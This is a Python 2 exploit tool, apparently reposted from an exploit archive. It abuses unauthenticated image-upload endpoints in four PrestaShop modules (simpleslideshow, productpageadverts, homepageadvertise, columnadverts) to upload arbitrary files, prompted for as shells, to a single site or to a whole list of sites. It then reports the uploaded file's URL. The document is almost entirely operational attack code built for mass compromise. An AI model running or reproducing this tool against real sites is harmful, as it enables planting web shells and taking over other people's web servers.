PrestaShop Exploit

1. #!/usr/bin/python
2. ####################################################################################
3. #Author : PentesterDesk
4. #Date : 20-June-2016
5. #Software: Prestashop CMS
6. #vuln Mod: Simpleslideshow , productpageadverts , Homepageadvertise , columnadverts
7. ####################################################################################
8. #import sys, os
9. import time
10. import requests
11. def main():
12. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
13.  
14. banner = '''
15.  
16. +======================================================+
17. | Prestashop | FileUpload Exp | PentesterDesk |
18. | Found by : Muhammad Faisal Gunanda |
19. | Coded by : PentesterDesk Team |
20. | Contact : pentesterdesk@gmail.com |
21. +======================================================+
22. '''
23. print banner
24. print "[1] SimpleSlideShow "
25. print "[2] Productpageadverts"
26. print "[3] HomepageAdvertise"
27. print "[4] columnAdverts"
28. ch1=raw_input("\n[>] ")
29. #1 SimpleSlideShow
30. if ch1 == '1':
31. # os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
32. print banner
33. print "\n <==============SimpleSlideShow Exploit=================>\n"
34. print "[1] Single Site "
35. print "[2] Mass Upload"
36. print "[3] GoTo Home"
37. ch2=raw_input("\n[>] ")
38. if ch2 == '3':
39. main()
40. if ch2 == '1':
41. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
42. print banner
43. print "\n <==============SimpleSlideShow Exploit=================>\n"
44. url = raw_input("[+] Enter Url : ")
45. filname= raw_input("[+] Enter File : ")
46. if filname == '' or url == '':
47. print "\n[!] Url or File is not entered\n"
48. raw_input("[+] Enter Any key to try agian [>] ")
49. main()
50. #url Logic
51. if '/modules/simpleslideshow/' in url:
52. url=url.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
53. elif '/modules/simpleslideshow/uploadimage.php' in url:
54. url=url
55. else:
56. url = url + "/modules/simpleslideshow/uploadimage.php"
57. #main
58. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
59. req=requests.post(url,files=files)
60. if req.status_code == 200 or 'success' in req.text:
61. url=url.replace('/uploadimage.php','/slides/'+filname)
62. print ("[+] %s [ok]" % (url))
63. else:
64. print "\n[+] %s \n" %url
65. raw_input("\n[+] Press Enter [>] ")
66. main()
67. #Mass upload Logic
68. if ch2 == '2':
69. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
70. print banner
71. print "\n <==============SimpleSlideShow Exploit=================>\n"
72. filee = raw_input("[+] Enter List Name : ")
73. filname= raw_input("[+] Enter Shell Name : ")
74. if filname == '' or filee == '':
75. print "\n[!] Url or File is not entered\n"
76. raw_input("[+] Enter Any key to try agian [>] ")
77. main()
78. ob = open(filee,'r')
79. lists = ob.readlines()
80. list1 = []
81. i = 0
82. for i in range(len(lists)):
83. list1.append(lists[i].strip('\n'))
84.  
85. count = 0
86. for site in (list1):
87. count = count + 1
88. if '/modules/simpleslideshow/' in site:
89. url=site.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
90. elif '/modules/simpleslideshow/uploadimage.php' in site:
91. url=site
92. else:
93. url = site + "/modules/simpleslideshow/uploadimage.php"
94. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
95. req=requests.post(url,files=files)
96. if req.status_code == 200 or 'success' in req.text:
97. url=url.replace('/uploadimage.php','/slides/'+filname)
98. print ("[%d] %s [ ok ]" % (count,url))
99. else:
100. print ("[%d] %s " % (count,url))
101. raw_input("\n[+] Press Enter [>] ")
102. main()
103.  
104. #2 productpageadverts
105. if ch1 == '2':
106. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
107. print banner
108. print "\n <==============Productpageadverts Exploit==============>\n"
109. print "[1] Single Site "
110. print "[2] Mass Upload"
111. print "[3] GoTo Home"
112. ch2=raw_input("\n[>] ")
113. if ch2 == '3':
114. main()
115. if ch2 == '1':
116. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
117. print banner
118. print "\n <==============Productpageadverts Exploit==============>\n"
119. url = raw_input("[+] Enter Url : ")
120. filname= raw_input("[+] Enter File : ")
121. if filname == '' or url == '':
122. print "\n[!] Url or File is not entered\n"
123. raw_input("[+] Enter Any key to try agian [>] ")
124. main()
125. #url Logic
126. if '/modules/productpageadverts/' in url:
127. url=url.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
128. elif '/modules/productpageadverts/uploadimage.php' in url:
129. url=url
130. else:
131. url = url + "/modules/productpageadverts/uploadimage.php"
132. #main
133. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
134. req=requests.post(url,files=files)
135. if req.status_code == 200 or 'success' in req.text:
136. url=url.replace('/uploadimage.php','/slides/'+filname)
137. print ("[+] %s [ ok ]" % (url))
138. else:
139. print "\n\[+] %s \n" %url
140. raw_input("\n[+] Press Enter [>] ")
141. main()
142. #Mass upload Logic
143. if ch2 == '2':
144. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
145. print banner
146. print "\n <==============Productpageadverts Exploit==============>\n"
147. filee = raw_input("\033[1;36m[+] Enter List Name : \033[1;m")
148. filname= raw_input("\033[1;36m[+] Enter Shell Name : \033[1;m")
149. if filname == '' or filee == '':
150. print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
151. raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
152. main()
153. ob = open(filee,'r')
154. lists = ob.readlines()
155. list1 = []
156. i = 0
157. for i in range(len(lists)):
158. list1.append(lists[i].strip('\n'))
159.  
160. count = 0
161. for site in (list1):
162. count = count + 1
163. if '/modules/productpageadverts/' in site:
164. url=site.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
165. elif '/modules/simpleslideshow/uploadimage.php' in site:
166. url=site
167. else:
168. url = site + "/modules/productpageadverts/uploadimage.php"
169. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
170. req=requests.post(url,files=files)
171. if req.status_code == 200 or 'success' in req.text:
172. url=url.replace('/uploadimage.php','/slides/'+filname)
173. print ("[%d] %s [ ok ]" % (count,url))
174. else:
175. print ("[%d] %s " % (count,url))
176. raw_input("\n[+] Press Enter [>] ")
177. main()
178. #3 homepageadvertise
179. if ch1 == '3':
180. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
181. print banner
182. print "\n <==============HomePageAdvertise Exploit===============>\n"
183. print "[1] Single Site "
184. print "[2] Mass Upload"
185. print "[3] GoTo Home"
186. ch2=raw_input("\n[>] ")
187. if ch2 == '3':
188. main()
189. if ch2 == '1':
190. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
191. print banner
192. print "\n <==============HomePageAdvertise Exploit===============>\n"
193. url = raw_input("[+] Enter Url : ")
194. filname= raw_input("[+] Enter File : ")
195. if filname == '' or url == '':
196. print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
197. raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
198. main()
199. #url Logic
200. if '/modules/homepageadvertise/' in url:
201. url=url.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
202. elif '/modules/homepageadvertise/uploadimage.php' in url:
203. url=url
204. else:
205. url = url + "/modules/homepageadvertise/uploadimage.php"
206. #main
207. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
208. req=requests.post(url,files=files)
209. if req.status_code == 200 or 'success' in req.text:
210. url=url.replace('/uploadimage.php','/slides/'+filname)
211. print ("[+] %s [ ok ]" % (url))
212. else:
213. print "\n[+] %s \n" %url
214. raw_input("\n[+] Press Enter [>] ")
215. main()
216. #Mass upload Logic
217. if ch2 == '2':
218. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
219. print banner
220. print "\n <==============HomePageAdvertise Exploit===============>\n"
221. filee = raw_input("[+] Enter List Name : ")
222. filname= raw_input("[+] Enter Shell Name : ")
223. if filname == '' or filee == '':
224. print "\n\[!] Url or File is not entered\n"
225. raw_input("[+] Enter Any key to try agian [>] ")
226. main()
227. ob = open(filee,'r')
228. lists = ob.readlines()
229. list1 = []
230. i = 0
231. for i in range(len(lists)):
232. list1.append(lists[i].strip('\n'))
233.  
234. count = 0
235. for site in (list1):
236. count = count + 1
237. if '/modules/homepageadvertise/' in site:
238. url=site.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
239. elif '/modules/homepageadvertise/uploadimage.php' in site:
240. url=site
241. else:
242. url = site + "/modules/homepageadvertise/uploadimage.php"
243. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
244. req=requests.post(url,files=files)
245. if req.status_code == 200 or 'success' in req.text:
246. url=url.replace('/uploadimage.php','/slides/'+filname)
247. print ("[%d]] %s [ ok ]" % (count,url))
248. else:
249. print ("[%d] %s " % (count,url))
250. raw_input("\n[+] Press Enter [>] ")
251. main()
252. #4 columnadverts
253. if ch1 == '4':
254. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
255. print banner
256. print "\n <================ColumnAdvers Exploit==================>\n"
257. print "[1] Single Site "
258. print "[2] Mass Upload"
259. print "[3] GoTo Home"
260. ch2=raw_input("\n[>] ")
261. if ch2 == '3':
262. main()
263. if ch2 == '1':
264. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
265. print banner
266. print "\n <================ColumnAdvers Exploit==================>\n"
267. url = raw_input("[+] Enter Url : ")
268. filname= raw_input("[+] Enter File : ")
269. if filname == '' or url == '':
270. print "\n[!] Url or File is not entered\n"
271. raw_input("[+] Enter Any key to try agian [>] ")
272. main()
273. #url Logic
274. if '/modules/columnadverts/' in url:
275. url=url.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
276. elif '/modules/columnadverts/uploadimage.php' in url:
277. url=url
278. else:
279. url = url + "/modules/columnadverts/uploadimage.php"
280. #main
281. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
282. req=requests.post(url,files=files)
283. if req.status_code == 200 or 'success' in req.text:
284. url=url.replace('/uploadimage.php','/slides/'+filname)
285. print ("[+] %s [ ok ]" % (url))
286. else:
287. print "\n[+] %s \n" %url
288. raw_input("\n[+] Press Enter [>] ")
289. main()
290. #Mass upload Logic
291. if ch2 == '2':
292. #os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
293. print banner
294. print "\n <================ColumnAdvers Exploit==================>\n"
295. filee = raw_input("[+] Enter List Name : ")
296. filname= raw_input("[+] Enter Shell Name : ")
297. if filname == '' or filee == '':
298. print "\n[!] Url or File is not entered\n"
299. raw_input("[+] Enter Any key to try agian [>] ")
300. main()
301. ob = open(filee,'r')
302. lists = ob.readlines()
303. list1 = []
304. i = 0
305. for i in range(len(lists)):
306. list1.append(lists[i].strip('\n'))
307.  
308. count = 0
309. for site in (list1):
310. count = count + 1
311. if '/modules/columnadverts/' in site:
312. url=site.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
313. elif '/modules/columnadverts/uploadimage.php' in site:
314. url=site
315. else:
316. url = site + "/modules/columnadverts/uploadimage.php"
317. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
318. req=requests.post(url,files=files)
319. if req.status_code == 200 or 'success' in req.text:
320. url=url.replace('/uploadimage.php','/slides/'+filname)
321. print ("[%d] %s [ ok ]" % (count,url))
322. else:
323. print ("[%d] %s " % (count,url))
324. raw_input("\n[+] Press Enter [>] ")
325. main()
326. if __name__ == "__main__":
327. main()
328.  
329. # 0day.today [2016-06-25] #